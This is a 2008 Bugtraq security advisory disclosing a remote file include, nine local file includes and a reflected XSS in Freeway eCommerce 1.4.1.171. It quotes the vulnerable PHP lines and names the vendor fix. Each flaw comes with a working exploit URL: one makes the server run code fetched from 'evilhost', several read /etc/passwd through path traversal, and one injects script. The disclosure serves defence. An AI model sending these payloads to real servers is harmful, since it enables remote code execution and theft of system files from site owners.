[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171

To: bugtraq@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx, packet@xxxxxxxxxxxxxxxxxxxxxxx
Subject: [DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171
From: "Digital Security Research Group [DSecRG]" <research@xxxxxxx>
Date: Mon, 18 Aug 2008 16:39:24 +0400
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: Digital Security
Reply-to: "CTac C." <research@xxxxxxx>

Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-036


Application:                    Freeway eCommerce
Versions Affected:              1.4.1.171
Vendor URL:                     http://www.openfreeway.org/
Bugs:                           RFI, Multiple LFI, XSS
Exploits:                       YES
Reported:                       27.06.2008
Second report:                  04.07.2008
Vendor response:                06.07.2008
Solution:                       YES    
Date of Public Advisory:        18.08.2008
Author:                         Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***********

Freeway eCommerce system has multiple security vulnerabilities:

1. Multiple Remote/Local File Include
2. Linked XSS vulnerability 


Details
*******

1. Freeway eCommerce has Multiple Remote/Local File Include vulnerabilities.

1.1 Remote File Include vulnerability found in script admin/create_order_new.php

Vulnerable GET parameter "include_page".

Code
****
#################################################

...
   $command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...

        if($command!="")
        {
                switch($command){
...
                        case 'include_page':
                                require($HTTP_GET_VARS['include_page']);
                                break;
...

#################################################

Example:

http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php


1.2 Local File Include vulnerability found in script 
includes/events_application_top.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_EVENTS_MESSAGES_MAIL); 

#################################################

Example:

http://[server]/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00


1.3 Local File Include vulnerabilities found in scripts 

includes/languages/english/account.php
includes/languages/french/account.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . "/events_account.php");

#################################################

Example:

http://[server]/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00


1.4 Local File Include vulnerability found in script 
includes/languages/french/account_newsletters.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . "/events_account_newsletters.php");

#################################################

Example:

http://[server]/[installdir]/includes/languages/french/account_newsletters.php?language=../../../../../../../../../../../../../etc/passwd%00


1.5 Local File Include vulnerability found in script 
includes/modules/faqdesk/faqdesk_article_require.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_FAQDESK_REVIEWS_ARTICLE);

#################################################

Example:

http://[server]/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00


1.6 Local File Include vulnerability found in script 
includes/modules/newsdesk/newsdesk_article_require.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_NEWSDESK_REVIEWS_ARTICLE);

#################################################

Example:

http://[server]/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00


1.7 Local File Include vulnerability found in script 
templates/Freeway/boxes/card1.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . '/cards1_box.php');

#################################################

Example:

http://[server]/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00


1.8 Local File Include vulnerability found in script 
templates/Freeway/boxes/loginbox.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . '/loginbox.php');

#################################################

Example:

http://[server]/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00


1.9 Local File Include vulnerability found in script 
templates/Freeway/boxes/whos_online.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . '/whos_onlinebox.php');

#################################################

Example:

http://[server]/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00


1.10 Local File Include vulnerability found in script 
templates/Freeway/mainpage_modules/mainpage.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

include(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFINE_MAINPAGE);

#################################################

Example:

http://[server]/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00


---------------------------------------------------------------------


2. Linked XSS vulnerability found in script admin/search_links.php

GET parameter "search_link"

Example:

http://[server]/[installdir]/admin/search_links.php?search_link=";<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>



Solution
********

Vendor fix this flaw on 13.08.2008. New version of Freeway 1.4.2.197 [Sathish] 
can be download here:

http://www.openfreeway.org/download.html

Change Log:

http://www.openfreeway.org/download/change-log.html



About
*****

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsec.ru (in Russian)

Prev by Date: NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection
Next by Date: Tool: PorkBind v1.3 Nameserver Security Scanner (New Version)
Previous by thread: NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection
Next by thread: Tool: PorkBind v1.3 Nameserver Security Scanner (New Version)
Index(es):
- Date
- Thread